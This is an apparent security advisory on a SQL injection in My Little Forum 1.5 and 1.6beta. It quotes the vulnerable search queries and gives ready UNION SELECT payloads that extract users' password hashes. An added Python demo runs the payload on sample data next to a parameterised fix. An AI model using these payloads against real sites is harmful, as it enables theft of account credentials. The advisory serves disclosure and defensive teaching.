Affected systems:
my little homepage My Little Forum 1.6beta
my little homepage My Little Forum 1.5
Description:
BUGTRAQ ID: 14908
My Little Forum is a simple web forum application.
My Little Forum contains a SQL injection vulnerability; an attacker who exploits it successfully can read arbitrary data from the underlying database, including password hashes.
At line 144 of search.php:
...
// $search_string is built from the user's search input and concatenated into the
// query with no escaping or parameter binding; the SELECT returns 12 columns
$result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
    $time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
    DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, '".$lang['time_format']."')
    AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."
    WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
    .$settings['search_results_per_page'], $connid);
...
Then, on the search page, select "phrase" and enter (12 user_pw columns, matching the 12 columns of the original SELECT):
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*
Because $search_string is not filtered, any administrator's or user's password hash can be obtained this way when magic_quotes_gpc is off (with it on, the single quotes in the payload are escaped and this particular string fails).
Version 1.6beta is also affected:
...
// same pattern: $search_string is interpolated unescaped; this SELECT returns 11 columns
$result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL
    ".$time_difference." HOUR) AS Uhrzeit, subject, name, email, hp, place, text,
    category FROM ".$db_settings['forum_table']." WHERE ".$search_string." ORDER BY tid
    DESC, time ASC LIMIT ".$ul.", ".$settings['search_results_per_page'], $connid);
...
Since this query returns 11 columns instead of 12, drop one user_pw from the UNION SELECT; the result is the same:
[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*
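To show why the two payloads above work and why the column count has to match, the following script (added here; it is not part of the advisory or of My Little Forum's code) rebuilds the 1.6beta query over an in-memory SQLite database and runs both a normal phrase search and the injected one, beside a parameterised version of the same query that stops the injection. Assumptions: the phrase search builds $search_string as text LIKE '%…%' (the advisory does not show that code); the table forum_entries, its rows and the admin hash are constructed sample data; SQLite's strftime stands in for MySQL's UNIX_TIMESTAMP.

```python
import sqlite3

# Constructed sample schema and rows (not the forum's real data); the column names follow
# the 1.6beta query quoted in the advisory.
SCHEMA = """
CREATE TABLE forum_entries (
    id INTEGER, pid INTEGER, tid INTEGER, time TEXT, subject TEXT, name TEXT,
    email TEXT, hp TEXT, place TEXT, text TEXT, category INTEGER);
CREATE TABLE forum_userdata (user_name TEXT, user_pw TEXT);
INSERT INTO forum_entries VALUES
    (1, 0, 1, '2005-09-20 10:00:00', 'hello', 'alice', 'a@example.org', '', '', 'first post', 0),
    (2, 1, 1, '2005-09-20 11:00:00', 'Re: hello', 'bob', 'b@example.org', '', '', 'second post', 0);
INSERT INTO forum_userdata VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # constructed value (md5 of "password")

# The advisory's 1.6beta payload: 11 user_pw columns to match the 11 columns of the
# original SELECT; "zzz%'" closes the LIKE pattern, "/*" comments out ORDER BY ... LIMIT.
PAYLOAD = ("zzz%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, "
           "user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata WHERE "
           "user_name='admin' /*")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_search(conn, phrase, time_difference=0, ul=0, per_page=10):
    """Mirrors search.php: the phrase is spliced into the SQL text unescaped.
    Assumption: phrase mode builds $search_string as  text LIKE '%<phrase>%'."""
    search_string = "text LIKE '%" + phrase + "%'"
    sql = ("SELECT id, pid, tid, strftime('%s', time, '"
           + "{:+d} hours".format(time_difference) + "') AS Uhrzeit, "
           "subject, name, email, hp, place, text, category FROM forum_entries WHERE "
           + search_string + " ORDER BY tid DESC, time ASC LIMIT "
           + str(ul) + ", " + str(per_page))
    return conn.execute(sql).fetchall()


def safe_search(conn, phrase, time_difference=0, ul=0, per_page=10):
    """Same query with bound parameters: the phrase can only ever be LIKE pattern data,
    so the quote, UNION and comment in the payload are never parsed as SQL."""
    sql = ("SELECT id, pid, tid, strftime('%s', time, ?) AS Uhrzeit, "
           "subject, name, email, hp, place, text, category FROM forum_entries WHERE "
           "text LIKE ? ORDER BY tid DESC, time ASC LIMIT ?, ?")
    params = ("{:+d} hours".format(time_difference), "%" + phrase + "%", ul, per_page)
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("normal phrase :", vulnerable_search(conn, "first"))
    print("injected      :", vulnerable_search(conn, PAYLOAD))   # one row of 11 x the hash
    print("parameterised :", safe_search(conn, PAYLOAD))         # no rows
```

Running it, the injected search returns a single row whose every column is the admin hash, because the UNIONed row is rendered wherever the forum would display subject, name, text and so on; with one user_pw too many or too few the database rejects the statement instead. The parameterised query returns nothing for the payload, since it is only ever compared as a LIKE pattern. Escaping quotes (what magic_quotes_gpc did) blocks this specific string but not a numeric context or a second-order injection, which is why binding parameters is the fix to reach for.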
Vendor patch:
my little homepage
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
http://www.mylittlehomepage.net/forum_script.html